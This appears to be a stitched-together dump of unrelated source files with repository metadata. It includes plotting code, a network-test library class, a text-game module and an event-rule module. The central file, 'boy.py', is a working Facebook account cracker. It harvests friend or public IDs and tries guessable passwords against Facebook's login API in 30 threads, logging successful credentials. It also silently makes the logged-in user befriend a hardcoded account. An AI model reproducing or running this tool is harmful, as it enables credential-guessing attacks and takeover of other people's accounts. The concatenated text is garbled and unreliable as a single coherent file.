plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%m/%d/%y')) #display the date properly
if x_interval:
plt.gca().xaxis.set_major_locator(mdates.DayLocator(interval=x_interval)) #x axis tick every 60 days
if y_interval:
plt.gca().yaxis.set_major_locator(ticker.MultipleLocator(y_interval)) # sets y axis tick spacing to 100
for field in columns:
plt.plot(x[startInd:endInd], self.data[field][startInd:endInd], label=field) #plots the x and y
if bot_results is not None:
for res in bot_results:
plt.plot(x[startInd:endInd], res["performance"][startInd:endInd], label=res["name"])
# Configure chart settings
plt.legend()
plt.grid(True) #turns on axis grid
plt.ylim(0) #sets the y axis min to zero
plt.xticks(rotation=90, fontsize = 10) #rotates the x axis ticks 90 degress and font size 10
plt.title("%s:" % (self.ticker)) #prints the title on the top
plt.ylabel('Stock Price') #labels y axis
plt.xlabel('Date') #labels x axis
plt.tight_layout()
plt.show()
def dateRangeToInds(start, end, x=[]):
"""
Returns the index of start and end dates in given sorted date array
On error or invalid params, returns first and last index
Help from: https://stackoverflow.com/questions/32237862/find-the-closest-date-to-a-given-date
"""
start = dt.datetime.strptime(start,'%m/%d/%y').date()
end = dt.datetime.strptime(end,'%m/%d/%y').date()
if start < x[0] or start > x[-1] or end < x[0] or end > x[-1]:
return (0, len(x))
return (x.index(min(x, key=lambda y: abs(y - start))),
x.index(min(x, key=lambda y: abs(y - end)))) | [
"sunnynagam1@gmail.com"
] | sunnynagam1@gmail.com |
ef00828694b672147ec72468ca0e0060e9d1e187 | 0d2c2703ebf2ef6440ce3bcbf8063248e6dec68d | /boy.py | 29677eb735439a7510a08eaa0a7220b713656987 | [] | no_license | mrsaqib/hackerboy | 7804c588635723ec995c5a94d1849d72e8a86151 | 9ed0da5d53ef1d4f6bc79a7d892f1d36a4f72370 | refs/heads/master | 2022-07-12T04:29:39.232408 | 2020-05-13T04:05:50 | 2020-05-13T04:05:50 | 263,517,606 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,734 | py | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """ -----------------------------•◈•
( __)\\ ____--------------_------------•◈•
|__(~) •||•SAQIB - UR -REHMAN------•◈•
|__\~~) •||•RANA - RAJPUT---------------•◈•
|__(-----\ •◈•------BLACK-TIGER--------•◈•
|__~~~\ •◈•-----█-------⑦-------█------•◈•
|__~~~\ •◈•-----█-------⑧-------█------•◈•
|__~~~\ •◈•-----█-------⑥-------█------•◈•
\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92Saqib khan
\033[1;96mInstagram \033[1;93m: \033[1;FlowSaqib
\033[1;96mFacebook \033[1;93m: \033[1; Saqibkhan4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://github.com/saqib/rehman
\033[1;91m======================================="""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;91m=======================================
\033[1;96mAuthor \033[1;93m: \033[1;92mRana Aahil
\033[1;96mInstagram \033[1;93m: \033[1;92mFlowRana
\033[1;96mFacebook \033[1;93m: \033[1;92m Aahilrana4072
\033[1;96mGithub \033[1;93m: \033[1;92mhttps://Github.com/Therana/zero
\033[1;91m======================================="""
print " \x1b[1;93m============================================================="
CorrectUsername = "rana"
CorrectPassword = "rana"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUsername Of Tool \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPassword Of Tool \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "Wrong Password"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "Wrong Username"
os.system('xdg-open https://www.Youtube.com/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN WITH FACEBOOK \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Successful'
os.system('xdg-open https://www.Facebook.com/Omi6t')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mIt seems that your account has a checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email is wrong")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mIt seems that your account has a checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mThere is no internet connection"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m Name \033[1;91m: \033[1;92m"+nama+"\033[1;97m "
print "\033[1;96m[\033[1;97m✓\033[1;96m]\033[1;93m ID \033[1;91m: \033[1;92m"+id+"\x1b[1;97m "
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Start Hacking"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Exit "
pilih()
def pilih():
unikers = raw_input("\n\033[1;97m >>> \033[1;97m")
if unikers =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print 42*"\033[1;96m="
print "\x1b[1;96m[\x1b[1;92m1\x1b[1;96m]\x1b[1;93m Crack From Friend List"
print "\x1b[1;96m[\x1b[1;92m2\x1b[1;96m]\x1b[1;93m Crack From Any Public ID"
print "\x1b[1;96m[\x1b[1;92m3\x1b[1;96m]\x1b[1;93m Crack From File"
print "\x1b[1;96m[\x1b[1;91m0\x1b[1;96m]\x1b[1;91m Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;97m >>> \033[1;97m")
if peak =="":
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print 42*"\033[1;96m="
jalan('\033[1;96m[✺] \033[1;93mGetting ID \033[1;97m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
print 42*"\033[1;96m="
idt = raw_input("\033[1;96m[+] \033[1;93mEnter ID \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;93mName\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;96m[!] \x1b[1;91mID Not Found!"
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
super()
jalan('\033[1;96m[✺] \033[1;93mGetting IDs \033[1;97m...')
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="3":
os.system('clear')
print logo
print 42*"\033[1;96m="
try:
idlist = raw_input('\x1b[1;96m[+] \x1b[1;93mEnter File Path \x1b[1;91m: \x1b[1;97m')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except IOError:
print '\x1b[1;96m[!] \x1b[1;91mFile Not Found'
raw_input('\n\x1b[1;96m[ \x1b[1;97mBack \x1b[1;96m]')
super()
elif peak =="0":
menu()
else:
print "\033[1;96m[!] \x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;96m[+] \033[1;93mTotal IDs \033[1;91m: \033[1;97m"+str(len(id))
jalan('\033[1;96m[✺] \033[1;93mStarting \033[1;97m...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[\033[1;97m✸\033[1;96m] \033[1;93mCracking \033[1;97m"+o),;sys.stdout.flush();time.sleep(1)
print
print('\x1b[1;96m[!] \x1b[1;93mTo Stop Process Press CTRL Then Press z')
print 42*"\033[1;96m="
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = ('786786')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass1
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass2
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass3
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass4
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = b['first_name'] + '12'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass5
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass6
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass7 = b['first_name'] + '1122'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;96m[\x1b[1;92mSuccessful\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;96m[\x1b[1;93mCheckpoint\x1b[1;96m]\x1b[1;97m ' + user + ' \x1b[1;96m|\x1b[1;97m ' + pass7
cek = open("out/checkpoint.txt", "a")
cek.write(user+"|"+pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 42*"\033[1;96m="
print '\033[1;96m[\033[1;97m✓\033[1;96m] \033[1;92mProcess Has Been Completed \033[1;97m....'
print"\033[1;96m[+] \033[1;92mTotal OK/\x1b[1;93mCP \033[1;91m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print("\033[1;96m[+] \033[1;92mCP File Has Been Saved \033[1;91m: \033[1;97mout/checkpoint.txt")
raw_input("\n\033[1;96m[\033[1;97mBack\033[1;96m]")
menu()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
b11bdcd4a134220f51a7db78eb753012b6bf3114 | b144c5142226de4e6254e0044a1ca0fcd4c8bbc6 | /ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/learnedrouteipv6_fdef4758ad13bb42ae07821a7635e378.py | ce66b77a40c84a94b26b3eb20ccb5a7f7182c9a5 | [
"MIT"
] | permissive | iwanb/ixnetwork_restpy | fa8b885ea7a4179048ef2636c37ef7d3f6692e31 | c2cb68fee9f2cc2f86660760e9e07bd06c0013c2 | refs/heads/master | 2021-01-02T17:27:37.096268 | 2020-02-11T09:28:15 | 2020-02-11T09:28:15 | 239,721,780 | 0 | 0 | NOASSERTION | 2020-02-11T09:20:22 | 2020-02-11T09:20:21 | null | UTF-8 | Python | false | false | 6,444 | py | # MIT LICENSE
#
# Copyright 1997 - 2019 by IXIA Keysight
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
from ixnetwork_restpy.base import Base
from ixnetwork_restpy.files import Files
class LearnedRouteIpv6(Base):
"""NOT DEFINED
The LearnedRouteIpv6 class encapsulates a list of learnedRouteIpv6 resources that is managed by the system.
A list of resources can be retrieved from the server using the LearnedRouteIpv6.find() method.
"""
__slots__ = ()
_SDM_NAME = 'learnedRouteIpv6'
def __init__(self, parent):
super(LearnedRouteIpv6, self).__init__(parent)
@property
def AsPath(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('asPath')
@property
def BlockOffset(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('blockOffset')
@property
def BlockSize(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('blockSize')
@property
def ControlWordEnabled(self):
"""NOT DEFINED
Returns:
bool
"""
return self._get_attribute('controlWordEnabled')
@property
def IpPrefix(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('ipPrefix')
@property
def LabelBase(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('labelBase')
@property
def LocalPreference(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('localPreference')
@property
def MaxLabel(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('maxLabel')
@property
def MultiExitDiscriminator(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('multiExitDiscriminator')
@property
def Neighbor(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('neighbor')
@property
def NextHop(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('nextHop')
@property
def OriginType(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('originType')
@property
def PrefixLength(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('prefixLength')
@property
def RouteDistinguisher(self):
"""NOT DEFINED
Returns:
str
"""
return self._get_attribute('routeDistinguisher')
@property
def SeqDeliveryEnabled(self):
"""NOT DEFINED
Returns:
bool
"""
return self._get_attribute('seqDeliveryEnabled')
@property
def SiteId(self):
"""NOT DEFINED
Returns:
number
"""
return self._get_attribute('siteId')
def find(self, AsPath=None, BlockOffset=None, BlockSize=None, ControlWordEnabled=None, IpPrefix=None, LabelBase=None, LocalPreference=None, MaxLabel=None, MultiExitDiscriminator=None, Neighbor=None, NextHop=None, OriginType=None, PrefixLength=None, RouteDistinguisher=None, SeqDeliveryEnabled=None, SiteId=None):
"""Finds and retrieves learnedRouteIpv6 data from the server.
All named parameters support regex and can be used to selectively retrieve learnedRouteIpv6 data from the server.
By default the find method takes no parameters and will retrieve all learnedRouteIpv6 data from the server.
Args:
AsPath (str): NOT DEFINED
BlockOffset (number): NOT DEFINED
BlockSize (number): NOT DEFINED
ControlWordEnabled (bool): NOT DEFINED
IpPrefix (str): NOT DEFINED
LabelBase (number): NOT DEFINED
LocalPreference (number): NOT DEFINED
MaxLabel (number): NOT DEFINED
MultiExitDiscriminator (number): NOT DEFINED
Neighbor (str): NOT DEFINED
NextHop (str): NOT DEFINED
OriginType (str): NOT DEFINED
PrefixLength (number): NOT DEFINED
RouteDistinguisher (str): NOT DEFINED
SeqDeliveryEnabled (bool): NOT DEFINED
SiteId (number): NOT DEFINED
Returns:
self: This instance with matching learnedRouteIpv6 data retrieved from the server available through an iterator or index
Raises:
ServerError: The server has encountered an uncategorized error condition
"""
return self._select(locals())
def read(self, href):
"""Retrieves a single instance of learnedRouteIpv6 data from the server.
Args:
href (str): An href to the instance to be retrieved
Returns:
self: This instance with the learnedRouteIpv6 data from the server available through an iterator or index
Raises:
NotFoundError: The requested resource does not exist on the server
ServerError: The server has encountered an uncategorized error condition
"""
return self._read(href)
| [
"srvc_cm_packages@keysight.com"
] | srvc_cm_packages@keysight.com |
dcfa00094dc418701fe53e2eac198128c1366eb9 | 9a8e7f01fa24622d1ae1f9abd0043cf89993c449 | /Textgame/tresureChest.py | 5261b2a93aa68861cbd3f847c9d8f08d58e57139 | [] | no_license | AlAtEX/Infinite_Dungeon_Experience | 5038736659df1a6654ba20631429f90c6e720349 | e92647b860842676bdf8a8129b3e80129adf5980 | refs/heads/master | 2021-01-17T13:00:56.902536 | 2016-11-16T00:05:50 | 2016-11-16T00:05:50 | 59,617,308 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,151 | py | import itemGen, time
def get(Weapon,Armor,hp,mhp,xp,level,mi,ma):
print('You found a tresure chest!')
items = itemGen.tresureGen(level,mi,ma,mhp)
for item in items:
print(item['desc'])
time.sleep(1)
if item['type'] == 'st':
if Weapon < item['mod']:
Weapon = item['mod']
print('Your damage is now {a}!'.format(a = Weapon))
if item['type'] == 'ar':
if Armor < item['mod']:
Armor = item['mod']
print('Your defence is now {a}!'.format(a = Armor))
if item['type'] == 'hp':
hp += item['mod']
if hp > mhp:
hp = mhp
print('You were healed {a}HP!'.format(a = item['mod']))
if item['type'] == 'mhp':
mhp += item['mod']
print('Your max HP is now {a}!'.format(a = mhp))
if item['type'] == 'xp':
xp += item['mod']
print('Your xp is now {a}!'.format(a = xp))
time.sleep(1)
time.sleep(0.5)
print('You close the chest.')
return Weapon,Armor,hp,mhp,xp,level
| [
"noreply@github.com"
] | noreply@github.com |
33d7d3984074154f1458954d817c4aad253d0a81 | aab991d3e69703c309675bcbe62a0582f9f344bb | /base/app/app_functions/__init__.py | 835ace44cf8724c0cb2b60ffdbc3375e7934c3c9 | [] | no_license | fren46/custom-control-vnf-k8s | 395ff8166495e62b844a2b8dcd0e2436d1166cae | 811300177718a83ee75f8662e20b6378f746601c | refs/heads/master | 2022-12-24T07:02:04.534314 | 2020-10-10T09:08:02 | 2020-10-10T09:08:02 | 298,087,231 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,313 | py | import json
import os
from datetime import datetime, timedelta
#import redis
from requests import post
from base64 import b64decode
from krules_core.base_functions import RuleFunctionBase, DispatchPolicyConst
from krules_core.base_functions.misc import PyCall
from krules_core.providers import subject_factory, event_router_factory, configs_factory
class Schedule(RuleFunctionBase):
def execute(self, message=None, subject=None, payload=None, hash=None, when=lambda _: datetime.now(), replace=False):
if message is None:
message = self.message
if subject is None:
subject = self.subject
if payload is None:
payload = self.payload
if str(self.subject) != str(subject):
subject = subject_factory(str(subject), event_info=self.subject.event_info())
if callable(when):
when = when(self)
if type(when) is not str:
when = when.isoformat()
new_payload = {"message": message, "subject": str(subject), "payload": payload, "when": when, "replace": replace}
event_router_factory().route("schedule-message", subject, new_payload,
dispatch_policy=DispatchPolicyConst.DIRECT)
class WebsocketNotificationEventClass(object):
CHEERING = "cheering"
WARNING = "warning"
CRITICAL = "critical"
NORMAL = "normal"
# class WebsocketDevicePublishMessage(RuleFunctionBase):
#
# def execute(self, _payload):
#
# r = redis.StrictRedis.from_url(os.environ['REDIS_PUBSUB_ADDRESS'])
# r.publish(os.environ['WEBSOCKET_DEVICES_NOTIFICATION_RKEY'], json.dumps(
# {
# "device": self.subject.name,
# "payload": _payload
# }
# ))
class SlackPublishMessage(PyCall):
def execute(self, channel=None, text="", *args, **kwargs):
channel = channel or "devices_channel"
slack_settings = configs_factory().get("apps").get("slack")
#funzione execute della classe PyCall, non fa altro che eseguire una generica funzione python
#la funzione viene eseguita all'interno di un try catch
#la funzione che esegue è quella passata come primo argomento
super().execute(post, args=(slack_settings[channel],), kwargs={
"json": {
"type": "mrkdwn",
"text": text
}
})
class SlackPublishInteractiveMessage(PyCall):
def execute(self, channel=None, text="", *args, **kwargs):
channel = channel or "devices_channel"
slack_settings = configs_factory().get("apps").get("slack")
super().execute(post, args=(slack_settings[channel],), kwargs={
"json": {
"blocks": [
{
"type": "section",
"text": {
"type": "mrkdwn",
"text": text
}
},
{
"type": "actions",
"elements": [
{
"type": "button",
"text": {
"type": "plain_text",
"text": "Accetto"
#"emoji": "true"
},
"value": self.subject.name
},
{
"type": "button",
"text": {
"type": "plain_text",
"text": "Rifiuta"
#"emoji": "true"
},
"value": "click_false"
}
]
}
]
}
})
class B64Decode(RuleFunctionBase):
def execute(self, source, payload_dest):
self.payload[payload_dest] = json.loads(b64decode(source).decode("utf-8"))
class PPrint(RuleFunctionBase):
def execute(self, something):
from pprint import pprint
pprint(something)
| [
"francesco.valente95@gmail.com"
] | francesco.valente95@gmail.com |
03a3e0ebe12bd7266956a59797984f584b2c24bb | deb6a9900bf5767ca9be40c658eab1fa7ae1ea40 | /formatml/parsing/parser.py | d2e19c5add03c5abd0577ce12cce4174cb4a6f30 | [
"Apache-2.0"
] | permissive | isabella232/formatml | fb73306f18614865401768be96d928cd8bc838f2 | f052313391a5a2ca47af7859520f968c423024f1 | refs/heads/master | 2022-02-22T17:27:52.829956 | 2019-09-10T16:22:44 | 2019-09-10T16:22:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 19,292 | py | from difflib import context_diff as unified_diff
from itertools import islice
from logging import getLogger
from os import environ
from pathlib import Path
from re import compile as re_compile, escape as re_escape
from typing import Any, Callable, Dict, List, NamedTuple, Optional, Set
from bblfsh import BblfshClient, Node as BblfshNode, role_name
from numpy import array, int32, uint32, unicode_
FORMATTING_INTERNAL_TYPE = "Formatting"
FORMATTING_ROLE = "FORMATTING"
class ParsingException(Exception):
"""Exception thrown in case of parsing failure."""
pass
class Node:
"""Replacement for bblfsh.Node to ease parent navigation."""
def __init__(
self,
*,
token: Optional[str],
internal_type: str,
roles: List[str],
